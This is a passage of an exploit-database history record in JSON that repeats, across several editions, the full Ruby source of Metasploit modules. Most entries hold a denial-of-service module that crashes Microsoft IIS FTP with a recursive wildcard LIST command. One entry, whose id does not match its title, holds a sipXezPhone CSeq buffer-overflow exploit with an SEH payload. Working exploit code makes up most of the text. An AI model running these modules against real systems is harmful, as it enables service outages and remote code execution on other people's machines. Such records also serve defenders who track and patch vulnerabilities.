failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-11T19:52:59", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 111}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "fc3571990762eef8014ffd1798ad7136", "type": "metasploit", "bulletinFamily": "exploit", "title": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", "description": "This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.\n", "published": "2006-09-13T06:20:05", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524"], "cvelist": ["CVE-2006-3524"], "lastseen": "2019-10-16T00:17:20", "history": [], "viewCount": 137, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2019-10-16T00:17:20"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3524"]}, {"type": "saint", "idList": ["SAINT:069D047A68E7FD9075AEACBBF45C1581", "SAINT:B1EE85BA43D9F6D0F7A422216D634076", "SAINT:66F2928947F2B882DE0E6AFE81C76D8A"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83094", "PACKETSTORM:83080", "PACKETSTORM:82931"]}, {"type": "exploitdb", "idList": ["EDB-ID:16351", "EDB-ID:2000", "EDB-ID:16353", "EDB-ID:16352"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SIP/AIM_TRITON_CSEQ", "MSF:EXPLOIT/WINDOWS/SIP/SIPXEZPHONE_CSEQ", "MSF:EXPLOIT/WINDOWS/SIP/SIPXPHONE_CSEQ"]}, {"type": "osvdb", "idList": ["OSVDB:27122"]}, {"type": "nessus", "idList": ["SIPXTAPI_CSEQ_OVERFLOW.NASL"]}], "modified": "2019-10-16T00:17:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sip/sipxezphone_cseq.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n ['CVE', '2006-3524'],\n ['OSVDB', '27122'],\n ['BID', '18906'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n\n 'Targets' =>\n [\n ['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],\n ],\n\n 'Privileged' => false,\n\n 'DisclosureDate' => 'Jul 10 2006',\n\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5060)\n ])\n end\n\n def exploit\n connect_udp\n\n print_status(\"Trying target #{target.name}...\")\n\n user = rand_text_english(2, payload_badchars)\n port = rand(65535).to_s\n filler = rand_text_english(260, payload_badchars)\n seh = generate_seh_payload(target.ret)\n filler[252, seh.length] = seh\n\n sploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\n sploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\n sploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\n sploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\n sploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\n sploit << \"CSeq: \" + filler + \"\\r\\n\"\n sploit << \"Max-Forwards: 20\" + \"\\r\\n\"\n sploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-16T00:17:20", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 112}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-16T02:00:03", "history": [], "viewCount": 137, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-16T02:00:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-16T02:00:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-16T02:00:03", "differentElements": ["modified", "published"], "edition": 113}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "a8492c8896a6140c62316ed6beef901b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-11-01T03:45:59", "history": [], "viewCount": 137, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-16T02:00:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-16T02:00:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-01T03:45:59", "differentElements": ["modified", "published"], "edition": 114}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-11-01T05:47:05", "history": [], "viewCount": 138, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-11-01T05:47:05"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-11-01T05:47:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-01T05:47:05", "differentElements": ["sourceData"], "edition": 115}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-11-23T12:58:46", "history": [], "viewCount": 138, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2019-11-23T12:58:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-11-23T12:58:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-23T12:58:46", "differentElements": ["sourceData"], "edition": 116}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-11-23T15:18:32", "history": [], "viewCount": 140, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-11-23T15:18:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-11-23T15:18:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-23T15:18:32", "differentElements": ["modified", "published"], "edition": 117}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "a8492c8896a6140c62316ed6beef901b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP 